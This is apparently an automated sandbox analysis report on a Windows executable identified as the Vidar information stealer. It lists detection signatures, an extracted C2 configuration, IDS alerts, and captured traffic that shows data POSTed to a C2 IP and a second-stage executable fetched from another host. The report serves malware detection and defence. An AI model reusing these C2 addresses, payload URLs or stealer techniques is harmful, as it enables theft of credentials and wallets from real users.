Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524654
MD5: d5251bd2a4d9ee464b1dbb25245a67a7
SHA1: a89c28d0c6f39475cf96c2129c4d10d73d0aa4b4
SHA256: 5aa5f829532b82d1d146841d843de9d3ab2278ba2c52402d51d18a5a2823872f
Tags: exeuser-Bitsight

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b74ef0d8ce56e494b0d83e1d5be9dbeb"}
Source: file.exe Virustotal: Detection: 30%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\msvcp110.dll Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A080A1 CryptUnprotectData,LocalAlloc,LocalFree, 3_2_02A080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A08048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 3_2_02A08048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A11E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 3_2_02A11E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0A7D8 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat, 3_2_02A0A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 3_2_6CA76C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5D38ED FindFirstFileExW, 0_2_6D5D38ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A15FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_02A0BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 3_2_02A14CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_02A1543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A01D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A0D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_02A0B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A09D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 3_2_02A15B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_02A0B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_02A0CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 3_2_02A15142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 3_2_02A014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 3_2_02A014AD

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.9:49715
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.9:49716
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 49.12.197.9 49.12.197.9
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 147.45.44.104 147.45.44.104
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49715 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49718 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49713 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49714 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49717 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49716 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49721 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49722 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49719 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49720 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49723 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49724 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49725 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49727 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49726 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49731 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49732 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49733 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49734 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49729 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49730 -> 49.12.197.9:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6897Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 131345Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9 (50 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A05237 GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 3_2_02A05237
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exeJ5
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
